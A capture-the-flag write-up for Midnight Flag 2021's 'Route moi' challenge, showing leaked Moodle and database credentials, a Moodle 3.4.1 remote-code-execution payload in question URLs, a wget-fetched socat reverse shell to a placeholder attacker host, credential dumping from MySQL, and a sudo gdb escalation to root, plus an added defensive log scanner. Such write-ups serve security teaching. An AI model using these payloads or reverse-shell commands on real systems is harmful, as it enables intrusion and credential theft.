Midnight Flag CTF 2021 — Realistic — Route moi — Write-up

Flag To The Future — Midnight Flag
Scoreboard

Route-moi — Mel

Moodle home page
Moodle login page
Course accessible without an account on Moodle
Public GitHub repository
Commits in the GitHub repository
Interesting commit in the GitHub repository
  • The Moodle version, 3.4.1
  • Mel's login credentials for Moodle
  • The database type, MySQL
  • The database credentials
// Moodle
$CFG->version = '3.4.1';
$CFG->username = 'meltheboss';
$CFG->password = 'R0uteM01!#';
// DB
$CFG->dbtype = 'mysqli';
$CFG->dbuser = 'kira';
$CFG->dbpass = 'eeICBkn2kiyWZMayas6o3';
* ------------------------------- *
* Noodle [Moodle RCE] (v3.4.1) *
* ------------------------------- *
[!] Make sure you have a listener
[!] at ATTACKER-IP:4444
[*] Logging in as user meltheboss with password R0uteM01!#
[+] Successful Login
[>] Moodle Session pckrulmghhig58ujs4ts088jm2
[>] Moodle Key afoF4SfhmS
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[-] EVIL QUESTION CREATION FAILED!
Adding a question to the quiz
Adding the payload to the question's substitution variable
http://217.160.15.230:39910/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=1&wizardnow=datasetitems&cmid=2&0=ls%20-al%20./%20%3E%20../test.txt
ls -al ./ > ../test.txt
http://217.160.15.230:39910/test.txt
Output of the command executed through the Moodle webshell
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER-IP:4444
http://217.160.15.230:39910/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=1&wizardnow=datasetitems&cmid=2&0=wget%20-q%20https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat%20-O%20/tmp/socat;%20chmod%20777%20/tmp/socat;%20/tmp/socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:ATTACKER-IP:4444
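As an added defender-side example, not part of the write-up, the following Python scanner runs over constructed access-log lines and flags calculated-question "datasetitems" requests whose digit-keyed parameters (the `&0=...` position used above) carry something other than a number. Client IPs, timestamps and the download host in the sample lines are constructed.

```python
# Added example, not part of the write-up: scan access-log lines for the
# calculated-question "dataset items" request shape used above. Legitimate
# dataset items are numbers, so a non-numeric value under a digit-keyed
# parameter is the indicator to alert on.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style log lines (IPs, timestamps and host are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Apr/2021:21:10:01 +0000] "GET /question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2&wizardnow=datasetitems&cmid=2&0=3.14 HTTP/1.1" 200 5120
10.0.0.9 - - [11/Apr/2021:21:12:44 +0000] "GET /question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D2&wizardnow=datasetitems&cmid=2&0=ls%20-al%20./%20%3E%20../test.txt HTTP/1.1" 200 5120
10.0.0.9 - - [11/Apr/2021:21:13:02 +0000] "GET /test.txt HTTP/1.1" 200 812
10.0.0.9 - - [11/Apr/2021:21:15:30 +0000] "GET /question/question.php?wizardnow=datasetitems&cmid=2&0=wget%20-q%20http://example.invalid/x%20-O%20/tmp/x%3B%20chmod%20%2Bx%20/tmp/x HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"^-?\d+(\.\d+)?$")


def suspicious_dataset_params(line):
    """Return decoded non-numeric dataset-item values found in one log line;
    empty when the line is not a datasetitems request or every item is numeric."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/question/question.php"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("wizardnow") != ["datasetitems"]:
        return []
    hits = []
    for key, values in qs.items():
        if key.isdigit():  # dataset items travel under numeric keys
            hits.extend(v for v in values if not NUMERIC_RE.match(v.strip()))
    return hits


def scan(log_text):
    """Map each offending 1-based line number to its suspicious values."""
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        hits = suspicious_dataset_params(line)
        if hits:
            findings[lineno] = hits
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: non-numeric dataset item(s): {hits}")
```

If the dataset form is submitted in a POST body instead of the query string shown in the write-up, the access log will not carry the values, and the same check has to run on a proxy or WAF log that records request bodies.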
nc -lvp 4444
Connection from 217.160.15.230:56218
www-data@9bc902ace084:/var/www/html/question$ whoami
whoami
www-data
www-data@9bc902ace084:/var/www/html/question$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
meltheboss:x:1000:1000::/home/meltheboss:/bin/sh
ftp:x:101:103:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false
systemd-network:x:103:106:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:104:107:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:105:109::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data@9bc902ace084:/var/www/html/question$ mysql -u kira --password="eeICBkn2kiyWZMyas6o3"
$ mysql -u kira --password="eeICBkn2kiyWZMyas6o3"
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 228
Server version: 5.7.33-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
6 rows in set (0.00 sec)
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass              | user_nicename | user_email     | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | meltheboss | UDRzc3cwcmQwZm0zbCEhCg | mel           | mel@theboss.fr |          | 2021-03-09 18:35:44 |                     |           0 | MelTheBoss   |
+----+------------+------------------------+---------------+----------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
mysql> exit
exit
Bye
www-data@9bc902ace084:/var/www/html/question$ print "UDRzc3cwcmQwZm0zbCEhCg==" | base64 -d
P4ssw0rd0fm3l!!
ssh meltheboss@217.160.15.230 -p 55183
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-66-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sun Apr 11 21:32:28 2021 from 87.231.53.88
$ whoami
meltheboss
$ cat flag.txt
MCTF{m00dl3_w4s_4_r34lly_b4d_1d34}

Route-moi — Root

  • sudo -l as meltheboss, to list the binaries that can potentially be run as root.
$ sudo -l
Matching Defaults entries for meltheboss on 9bc902ace084:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meltheboss may run the following commands on 9bc902ace084:
(ALL) NOPASSWD: /usr/local/bin/gdb_fork.py
sudo /usr/local/bin/gdb_fork.py
Absolute path of the file to execute: /tmp/test.py
/tmp/test.py
The content of the file does not seem to look like valid instructions executable by gdb or the PID is invalid or you try to attach to a forbidden process.
Example valid file:
import gdb
gdb.execute('attach x')
gdb.execute('i r a')
gdb.execute('quit')
import gdb
gdb.execute('attach x')
gdb.execute('i r a')
gdb.execute('quit')
sudo install -m =xs $(which gdb) ../gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
import gdb
gdb.execute('python print(open("/root/flag.txt").read())')
$ sudo /usr/local/bin/gdb_fork.py test.py
Absolute path of the file to execute: /tmp/test.py
MCTF{w00t_m3lth3b0ss_u_s4v3_r00t_m3_!!}
(gdb) quit
$

French CTF team
